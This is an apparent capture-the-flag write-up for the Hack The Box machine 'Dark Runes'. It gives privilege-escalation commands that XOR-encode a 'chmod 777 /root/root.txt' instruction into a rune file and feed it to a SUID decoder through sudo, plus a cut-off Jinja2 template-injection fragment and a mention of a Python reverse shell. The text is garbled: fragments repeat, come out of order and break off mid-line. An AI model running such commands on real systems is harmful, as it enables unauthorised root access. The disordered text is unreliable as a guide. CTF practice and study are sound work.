Htb Dark Runes May 2026

Payload:

sudo /usr/local/bin/rune_decoder /var/runes/evil.rune Now read /root/root.txt directly.

rune_decoder is a SUID binary that decodes "rune files" (binary format). Analyze with strings and ltrace : htb dark runes

Root flag acquired. 🏴‍☠️ | Phase | Technique | |-------|------------| | Web | Base64 rune encoding, token reuse, SSTI (Jinja2) | | Shell | Python reverse shell, PostgreSQL access | | Priv Esc | Custom binary analysis, XOR encryption bypass, sudo abuse | 🧙 Final Rune Reading Dark Runes is a love letter to CTF players who enjoy creative encoding, sneaky template injection, and low-level binary trickery. It rewards patience and curiosity—traits of a true digital rune mage.

echo -n "RUNECMD:chmod 777 /root/root.txt" > payload python3 -c 'print("".join(chr(ord(c) ^ 0x42) for c in open("payload").read()))' > /tmp/evil.rune Move to /var/runes/evil.rune and run: Payload: sudo /usr/local/bin/rune_decoder /var/runes/evil

SSH as admin with same password.

% with a=request a % endwith % uid=33(www-data) gid=33(www-data) groups=33(www-data) 🏴‍☠️ | Phase | Technique | |-------|------------| |

Machine Difficulty: Medium Category: Web, Cryptography, Binary Exploitation, Linux